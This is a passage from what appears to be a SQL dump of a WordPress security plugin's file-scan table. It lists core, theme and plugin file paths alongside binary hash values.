�G','',0,'?'),('�ڡV7\"�F*%8t�[�_','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/classes/class-epsilon-color-scheme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iE)g�4��6�)����','�����`5�S�\r�Y�be�Cq���P�����','',0,'?'),('�Z��D��l�=�컫','wp-content/plugins/wordfence/views/waf/waf-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Q�Oq�W����','a\"��μ�s�f��Ѳ>Zbk�xֲ|<�A','',0,'?'),('�!\"ro�ɿ��M�8�','wp-content/themes/twentynineteen/inc/icon-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�:L���o#5]Z�',')��D��7��^�ޞ��>���?}���4u����','',0,'?'),('�1�`��B���¡]�s','wp-includes/css/dist/editor/editor-styles.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/Ow�:#��v���\r',']��Ɇ���m�{�w��#ߟ^��,n����,>','',0,'?'),('�B%v6�I\"Jb��4ӡT','wp-admin/link-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�0iNj�����','�Lo(��m�ؾT���k�%<P!w�/\n�','',0,'?'),('�BK�@�~&�^��8','wp-content/themes/twentynineteen/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&t����\\�K����','�{��\Z\0�`OT�{>\0����½��� L>L�','',0,'?'),('�\\����X�:��k','wp-content/plugins/disable-gutenberg/fonts/awesome/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z������� 6�>','��@⣂�L�EQ��(�ie��q[N|&���Ð�','',0,'?'),('�y�4�\0�#ɚKV�/b','wp-content/themes/weblog/assets/library/html5shiv/html5shiv.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';@߂�j��Z��}Cڊ�','��yk�kV���0���+��k.�e|��_/]�G','',0,'?'),('��>�A�B�7�Sz!�e','wp-admin/includes/export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8:Y�Ǐ#��;Y','�g?�.�a��q�B�ٟE�F������o��|�','',0,'?'),('��|0���O�+�]lU�','wp-includes/js/dist/a11y.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','婯�S\Z�`�!`TLu','ʢ����Α%��d5F�(�VW��1�V|\"u99','',0,'?'),('���+�v��2�����','wp-content/plugins/disable-gutenberg/disable-gutenberg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&���B����[Kk�','���,,<z-����K����Æ��YqG��ɡ','',0,'?'),('���T�양�:t[��','wp-includes/Requests/Exception/HTTP/410.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�O47ߺݥ/8X!��','��9�f/3MM;#GڪWO&�tS�O\Z���Ƙ�','',0,'?'),('��]$�pWx�����','wp-content/themes/vision-lite/customize-pro/class-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�aq8�6l�Ρ�q','���ԕ��Aa�F��`!J�6#��{>!\ng� y�','',0,'?'),('�65\nN���x/\0���','wp-content/plugins/wp-cerber/assets/flags/mo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����aM7-�VD��%�','��K����v�FI���ۨ�0g��h�HV�R','',0,'?'),('��Zu��E\n��%�\r��','wp-content/themes/doctors/core/contents/loop_404/skin1/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-c����Hd@�<,O','C�L�D�6�A��~&?�h�`�/HYe
�ƽ4t�','',0,'?'),('�)����Yh�.�;��š','wp-includes/Requests/Exception/HTTP/412.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��Iܷ��=�7��V�','S�A�4c\\D�56-��#��d*���ҽӾ�R���','',0,'?'),('�0\0����M����k\\','wp-content/themes/weblog/acmethemes/customizer/design-options/colors-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�˔E�\n �T0�\n9�','�8p�z�����@s8�\"�8,s���1Z����)','',0,'?'),('�1�eU��MV��^��','wp-admin/includes/misc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��銻~F�a8U�\'v','��j{y˔���5N�1��ޝ���2콲��','',0,'?'),('�9�FX�A}B�`�u�','wp-content/themes/weblog/acmethemes/init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RchQ����]�f�*�','0�1B·���P�>�찅��Y�m�Na','',0,'?'),('�F_q���C�F!o4p��','wp-content/plugins/wordfence/views/scanner/scan-starter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��|#n��\0Y���','\\,���5�^�[A��:p�� �F���R��','',0,'?'),('�N6?`$�Qil�L','wp-content/plugins/wp-cerber/assets/flags/pe.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:���Z�d�D�\'y�1','8����,0��M߀�����҃��WO1q�','',0,'?'),('�P�4ՓQ�)zS���','wp-content/themes/twentytwentyone/assets/sass/04-elements/forms.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���M���G�ᆻ��$','*+���\0%G�;�_dE}u�-��4w�\"�','',0,'?'),('�SK�8kf�k��X�ҍ\\','wp-content/plugins/wp-cerber/assets/flags/ke.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��K�PS���P�X','�_��/�6�pp���� 6�4�zI\0ֱ�Éf','',0,'?'),('��~k/�vZ]f���','wp-content/themes/doctors/core/customizer/font.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�84ݺd����n�','�����:�����4\\�v��&�\r��\0Ɯ','',0,'?'),('��\0�>#����z(','wp-includes/bookmark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7!ć>pP�:�ޑ\r','6̎2M̥���?��&rA���bĪ�ux^с','',0,'?'),('���������}��','wp-admin/media-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�f���/�Pe��','�v��H1G�t�+�l�O\r�>��qc���m\\�iS','',0,'?'),('��4�[=t��|v%M�','wp-content/themes/advance/inc/kirki/Gruntfile.js',0,'NBԒ��vu�eV�','NBԒ��vu�eV�','�̂�::4�2P[�O���\'���P�����\0�L','',0,'?'),('���P�w���0�h�9','wp-includes/js/tinymce/plugins/fullscreen/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�����2İ\rm}%��','3��].�BCBe��ʢ�S�( ?�Z{����','',0,'?'),('�i��J�ϖ�]��mp','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-kirki-generic.php',0,'�^=\nm< ��\ne�<j�n','�^=\nm< ��\ne�<j�n','�J������Cr�]=�k�˿�*+)��U��(','',0,'?'),('�$��Q�h�25��� k','wp-content/themes/skt-toothy/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$���Ӽ \Z��\r���','M\'<o�\0�Ȏ�-)��F�������O�g��','',0,'?'),('�;j��|�:1/��','wp-admin/site-health-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K#uy�d>�ٲ�(H�(','o\'U����~ߡ�e�g�|�(��ې�3,�$','',0,'?'),('�=�IU��c�O�G�','wp-content/plugins/wp-cerber/assets/flags/fo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jX�?c0<G�Ia~�','��lNw�ʭ�!X�uw���_9{-]L��/ܐ','',0,'?'),('�B y�w�+���|t��','wp-includes/class-wp-http-requests-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�TP^��rbb!d�','�\Z���[Щǩ�{S.Ws:���e��\"#z�[N','',0,'?'),('�J�&_#��3S�q���','wp-admin/images/spinner-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1����2��^#�8��','��#�˒�=$c��6����� B��4�6','',0,'?'),('�V+@�0���p�ɏhi','wp-includes/rest-api/class-wp-rest-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�0����Sy?�','�fG]< *�:m/K<-�C�~�5�%���Sw','',0,'?'),('�Z���)_��w�\'$�X�','wp-includes/class-wp-block-parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�}�C�1gGr*� �7','&t�]�Y`�쿨�9}���܇W���-','',0,'?'),('�^Sx_?u�G�D���','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H�d9<C�ˤ���bl','K�.Bo����ࣸ�v��b�%����S~1�K��','',0,'?'),('�b~5�a���I@)*�','wp-includes/class-wp-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��eo��C�I�7#�\n��','-�h���ʠ^�F�0?�0\n�%s�ibV\\�X�','',0,'?'),('�dC����$wg�Bw�T','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/class-epsilon-framework.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��g0���ɸe�\Z��','�$�qF0\'l-;L��8uj��kan��f.��','',0,'?'),('�fG<�@៝N���-','wp-admin/includes/class-wp-privacy-requests-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z|���f����?','z�\\��?��+i.��x�7�j���.i����','',0,'?'),('�x9p�2���w���B','wp-includes/ms-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����x�����3.�','ʸ]ST���ySo$�Vgv�\"-j!QGK���','',0,'?'),('��-�y��[�(�<�%C','wp-content/plugins/all-in-one-wp-security-and-firewall/css/wp-security-admin-styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�!hQk�ө��Q���`',';�ǐs��:��;Mȴ�N�x�Cd/��+�','',0,'?'),('��������Fw4��\0�','wp-content/themes/healing-touch/images/icon2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �ZzC`O���EyF','ȆxG)*(���e=��1b��qz��6�oS','',0,'?'),('��\\:��ڈ��)g,\\','wp-includes/images/smilies/icon_twisted.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��v[?��+*8��;�','V�H�hK�����\n���p�����;.�&/E�','',0,'?'),('��u����L��N��^','wp-content/themes/healthcare/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�/o/\'�jr���$','�9�g�B�yo� A+B��]ghy|,Љo��n','',0,'?'),('��e��-osŕ;�/�','wp-content/themes/twentynineteen/style-editor-customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z]/��\'\'~�z�].Z[','�/} ��� ��ԾA9{�!���w���a��.','',0,'?'),('��D�,)�ֶ��飚','wp-content/themes/doctors/core/assets/css/swipebox.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4��>~���\'���L�','`��Q#��LU�~L�<:\"qT��j_�`u|�i��','',0,'?'),('��!��E��S7�x����','wp-content/wflogs/rules.php',0,'�(1\r���\"]��4���','�(1\r���\"]��4���','PM�瀺7�;��j�{��9�p����Q- s�:a','',0,'?'),('������>2\\o�)���','wp-includes/Requests/Exception/HTTP/Unknown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dl᫁�2�A��\nW�','@���3�#\Zж/*t\r��6<X�\r�IF','',0,'?'),('���3v�U�\Z3�P�^O ','wp-admin/css/widgets-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2՝�NI 3:_(��','$�C��s���,����ɍ��2�3-��Q�a','',0,'?'),('��o4}+��8��O�','wp-content/plugins/wp-cerber/assets/flags/nc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!5�A/g��4�S�H','�.)Po�\\r�d� !NZ�Ӆ�8��8E��','',0,'?'),('��L �U���f��u�<','wp-admin/images/icons32-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�P*���{>v��Uf','����?U��z��P\\��@�`�8g;\r����E','',0,'?'),('���o�w���Ў�696I','wp-includes/random_compat/cast_to_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�>����=I���O','p>2���x���tn�tq��������b','',0,'?'),('���փ�k;����Alt','wp-content/themes/doctors/images/demo/user_4.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�GG4M�v2�~','���6U,�#���]h��o�\\�X�8��F]s<','',0,'?'),('���ѩ]U�-^��\n','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-dropdown-pages-control.php',0,'H�0����熘y*v�','H�0����熘y*v�','�s\\�LZ���}�[Z!so{Xl�A��Q���b�','',0,'?'),('��[B�^�� Z�1�','wp-content/themes/twentynineteen/template-parts/content/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v\nqYĸ`p����','�?Zt-�(D��~���$mͼ�wj�x$\n�^E�','',0,'?'),('���Iy-�\n�ń��','wp-includes/Requests/Exception/Transport/cURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6T�g*\Z�: �x7��','�]���0֙8���p#�~��\\o�Ӂ=1��','',0,'?'),('�!z����>v� n���','wp-content/themes/advance/headers/part-headsingle.php',0,'D+@�&�2�;e8\'��','D+@�&�2�;e8\'��','Muh�$�Ed�J4�ib�5�˓���}m�G','',0,'?'),('�0�`á��z��-6�','wp-content/themes/weblog/acmethemes/customizer/header-options/social-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZPs�DZL�6Eq���','+T-k$\"(�R1�8?�T�Hl�z�J�!�J�','',0,'?'),('�:=�%����M�۵','wp-includes/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��f?Yk�EЉ��+V','a�+) �h=���%d�D�\Z/��BA��j\\�n','',0,'?'),('�I�{�?��r�]��7','wp-admin/images/resize-rtl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nC%�Y�f���v�F.z','@St-]�z��\'+k��2��{�j�,�QN��~)� >','',0,'?'),('�KH ]A(ς�\'�T�','wp-content/themes/healthcare/css/customizer-range-value-control.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[]��\"�x�EF�~�','�|�l4l�kЃ��Z ���&��{e~��','',0,'?'),('�U�7v��������\n','wp-content/plugins/wp-cerber/assets/multi/multi.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\���ݕD��E��','�W>)pM��!��=�V#qu&,N�����+��','',0,'?'),('�`� Ƣ�Xv��{�;�','wp-includes/js/dist/edit-post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ե3<�Y5Ω8�z��;','�I&A ��k9H��xjW�;��JL�fS]z','',0,'?'),('���eM�y*Ҟ����','wp-includes/js/backbone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"$2hj32U������','�c�B�CP\0�F�!���vy6�Ku�*<c�f','',0,'?'),('��@k�&X�Itǜ','wp-includes/class-wp-block-styles-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kc�����\0z�[>�\rY','��J�x\r]�|��-��u+ߏ�$�a��','',0,'?'),('��Kk�f�g��T�#�V','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/UrlSafe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�er��x��|2c��','����.C��@2��P�c֜�^n\n�\'-�v[~','',0,'?'),('����n�\n�\0܁-i','wp-content/plugins/wordfence/images/blocking.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'-H�f���<1','A5�Y9���\0��O�tq�ЖL\\�}�a��&�','',0,'?'),('���g���[z�\0ή�','wp-content/plugins/wordfence/modules/login-security/views/page/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��MQ�@��Ǯ���I','����~�r�b�wTN�s��;3f��B���)A','',0,'?'),('���t�V��<��C��','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Traits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';HoĴ`��׳m�%�','�(��l]�h��Юa y�fh��0v\'u�vm�','',0,'?'),('��\\-\\��f�t�KD�s','wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#����� v��d','W�Y�0����2w�� 5�O���zm� ���^','',0,'?'),('��w��i.�w�(M;0D','wp-content/plugins/akismet/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9��|���2-�#�','�J�S�\\<�Cޏ�=s\'WI&\Z�(���vaTo','',0,'?'),('��T?�1�[��(�d�','wp-content/themes/doctors/core/assets/js/jquery.flexslider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b��@�����h�O\"','�r�c>�O�\n�rF�6�8����_���','',0,'?'),('��!?M�\"Q��e>��','wp-content/plugins/wp-cerber/assets/nexus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\"����tw�L�','clY`��-�]N�U��~���uA1W�R�j�XR�','',0,'?'),('���ws� ��+���C\'','wp-content/themes/twentytwenty/inc/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�l���Ѽ &.���','�_7�����\\�7�Hms��.:[)��dM�','',0,'?'),('���m�x�H&&I�','wp-content/themes/healing-touch/images/sktskill.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D)U)��`_0��>� U','ٮC^y������E}?e%0l�d��Lj�*;ࡏ','',0,'?'),('�.��x�Q}�t\np�','wp-includes/rest-api/endpoints/class-wp-rest-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q͊����tF����','�,��Ca�� NÉ���vK�hWIQ�xk|�Q','',0,'?'),('�7*���\"{��\n�K<','wp-admin/includes/ms-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��t{0o�ޖ','7<NoQF���\0�$�j�aϤ m���\r�i��','',0,'?'),('�?�8������Z��N�','wp-includes/ID3/module.tag.lyrics3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~w�\"[�װ���A�>A','�V*��&)��~��d�}K�,����E�s�','',0,'?'),('�X*����VL �_�','wp-includes/css/dist/block-library/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0}3�*�?�v�+,\"','&tT=����ȼitg`^�5����2G��Vcg<','',0,'?'),('�j��I���<��iU','wp-includes/category-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K������g�m�=5','S����.�k��Sgn8 �����H\"�','',0,'?'),('�s��c��d�\n-��%qW','wp-content/themes/wp-barrister/library/js/imagesloaded.pkgd.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xk2�;K��>H�p�','�8!#8�&,��O���52rU�܆�7~$|��','',0,'?'),('���&���}?�\Zs`�','wp-includes/js/wp-sanitize.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�f05��}$��]���','�Ea5/qJ�Xo+#x��[�X86)3�ن>��','',0,'?'),('��2u�\"<g�@�f�%','wp-content/plugins/wp-cerber/assets/flags/ki.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����K���ȶ�','�\"�&9ʈ��7�lZ��P�퇢 �j�/','',0,'?'),('���Q��Ws�A7d\n','wp-admin/css/site-icon-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`_?ބ=�|���+�d�','���M���S����>j/���\"K%qޣ��~','',0,'?'),('��e�\\��1�tƋ�< �','wp-content/plugins/wordfence/lib/wfUpdateCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&?C]�\\��g~�J;<:','3�*4��Sxg��\r�\Z\n�1?�N#?�a]��p','',0,'?'),('������G�G����a\"','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*M]YnM$^ù\"�','���ϐ�N���o�KtQ�V���\r3�-��y�-','',0,'?'),('��~͎��kf+<�e','wp-content/themes/healthcare/css/font-awesome/less/screen-reader.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&E����l�\"S��','���<S|�Ȣ�qW�0)>�>T;��w8��','',0,'?'),('����Z|��0�75�o�','wp-includes/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3��NM[�/�\r~H','�����r�W���Q@x[1� ���*o�9�$�','',0,'?'),('��B]nȄ�8�7g��','wp-includes/images/smilies/icon_rolleyes.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_5��6I���ĔE','b;�SG�`�JL�4�;ͮ1;\\����;xl��','',0,'?'),('��fR/1����< PC�','wp-includes/js/dist/shortcode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j���� Q�l�*,�I�','�� w6R�(�K�T%ni�1��0�����[r','',0,'?'),('���K�ȁ;$��z�','wp-includes/js/dist/notices.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m����5��F2�c�:į','�d��P��\'���Z8������ϭd�%9���AN','',0,'?'),('�!q[-n\rN��m7���','wp-content/plugins/redirection/api/api-export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t�G2�ڙs�Δ��','C���Hc��ݻ��T���^\Zxː\rp k�1','',0,'?'),('�$N6�v���qP+K�\Z','wp-content/themes/regina-lite/inc/components/contact-bar/class-mtl-contact-bar-output.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&\Z4\Z��>|��G^','B���C�,����4�$�I���m\n�6C�,','',0,'?'),('�F]?�,̏���g%^','wp-content/themes/doctors/core/contents/loop_comments/skin1/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Z1�B�f�%X\\�$�','|���Qt�9�6�\':�Ad���LMbz��k�\r','',0,'?'),('�HR3}��Zc�d�i','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-process-renamed-login-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�Q��$��� �o|C\\','�cS�/�8-(&�1H�4�����L�','',0,'?'),('�Mj�A�M��O�\"If','wp-includes/SimplePie/Net/IPv6.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r ��F�E��,�h�','p�t���[bm���M�_Iz�\"��[�j/�O�','',0,'?'),('�d��RĆC�P���b&','wp-content/themes/twentytwentyone/assets/sass/07-utilities/ie.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\rW�����Н','%��?�\Z�v�bq]��g�5Z)u�Ѷ\Z�o�\'�0','',0,'?'),('�kIK����V[�� 5�','wp-includes/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v>��#��!n�(','�DFUu|�v��/�]�2x_ERL2QlP93s �15�','',0,'?'),('�s��A��g��R�','wp-content/themes/skt-toothy/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,��t�E���3�,','+�\'�%^��9}�kh�i�A&�\ZdHYЦ���','',0,'?'),('�w�\Z�d�Ϣ�\ruD\"','wp-includes/IXR/class-IXR-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%p.<�Sǡ��z1Ϣ','Q�*k�_}��2���>T�q<�_S�:�Qh�','',0,'?'),('�xm�5��o�-]�Ž��','wp-content/plugins/wp-cerber/assets/sh/styles/shThemeDefault.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J��x�_r�Z�','�6�� Ք���ۻ����!�|d�p�','',0,'?'),('���������*_�\"','wp-content/plugins/wp-cerber/assets/flags/tc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sp�I��7��03CP','[���V�c\"��Z}t�a�n��%PB\ZgF�Yw','',0,'?'),('���/��\Z��)y�\r','wp-includes/blocks/html/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�FV�y�o����','���RA��A�ȧ/��r�4H�-@��(\n �7R4�','',0,'?'),('��$��xM1>�_8P\0','wp-includes/js/swfupload/swfupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#����9��>&YRg','��ݙ���R�YY-�ҕ�&qW1(�K��','',0,'?'),('��\nJ乐��1�cسDs','wp-content/themes/weblog/acmethemes/core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U.c�ø���e��','����Ĕ����m��t{����S�3����f�','',0,'?'),('��Qs|�c�LVH�)','wp-admin/includes/class-walker-nav-menu-checklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?L�,k��|n�','�r�J�_9���~��uz�{�z������P','',0,'?'),('��/8&�D�g|��#','wp-includes/js/dist/viewport.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ߙ��,���B�','H9����Y߈�݆��3L ��c���Jگ =�','',0,'?'),('�\Z���M`�yᕙd�','wp-content/plugins/wp-cerber/assets/flags/cm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�.��`�t�sI01','���F�]��g�ZBN��to Q��m�,�j','',0,'?'),('�Ox��ر��c5(','wp-includes/css/dist/block-library/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gs�Ib<���w]G��','כ�ppr��xI�xP^�? ���N�%�u�','',0,'?'),('�k]�}>��9]ϟ�3��','wp-content/themes/advance/404.php',0,'Â�Z�?1gc ��M�','Â�Z�?1gc ��M�','y5Le�oh�#�֬���փ�4��fH�z�','',0,'?'),('�n97�I.O�ҝ�','wp-includes/js/heartbeat.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^���@H�l�\Z�g2�','e�x\'�s��v+�q�LW����/,��k�g%\0�','',0,'?'),('�|Bl�IHҼ�OSƱ','wp-includes/js/mediaelement/mediaelement-migrate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�C�_hz�3��<7',',b#0�!a�OVc,��ؕSԏI�л%��p)��','',0,'?'),('���ب&G�)�k{��','wp-includes/sodium_compat/namespaced/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h���P���','K����d�%�.RAO�F��������jo�-','',0,'?'),('��M�Ӽ��7T�~���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�kA�`�lw���y�','7\r4 춥Q\nc��>c\n>�Pf8�4��Hk�','',0,'?'),('��f餧xM�P]~B��','wp-content/plugins/akismet/class.akismet-cli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��� ���qE9g:I','v26�}۞���\Z�\no��g$�$�@[�C�\\V','',0,'?'),('����h+��B����','wp-includes/js/tw-sack.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�X��wO��qa','k�\r<�I�-�Vsp�6gb4eb���fs�Ҹ��','',0,'?'),('��F�\"��vh�$Lb��','wp-includes/js/imgareaselect/border-anim-v.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �z!�<�7�����*�','��>���d�:���j1�<�!4�6�g��','',0,'?'),('��˩6�f/�6YjI\0�W','wp-content/plugins/wordfence/modules/login-security/views/settings/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��{��^vƍ����','Z��%��ĩZ�d�^����m���͖(8��ծ','',0,'?'),('����$d���w��','wp-content/themes/skt-toothy/customize-pro/example-1/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o��\04:\rlJLR','���Ðh��\r�(����X��.Z�ܕ@&\rt�','',0,'?'),('��MAH���\0�[d_�!','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),('��yc�0O�g)ρ�Mf�','wp-admin/network/site-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͢Ɵ6��ǰD�ۦ�','6i�b�؋��u-��L���^� �v�4|f�%�Xg','',0,'?'),('�tDZ%������F','wp-content/plugins/wordfence/lib/wfNotification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Ǎ V2�(��dhVD','S�a��Y����gj+|�� ��J��M8��','',0,'?'),('��Fj]p� ���Ac\rp','wp-includes/Requests/Exception/HTTP/406.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��l�h�r��9�\"\0�',',aY��}PR6���`�)K�f�ism 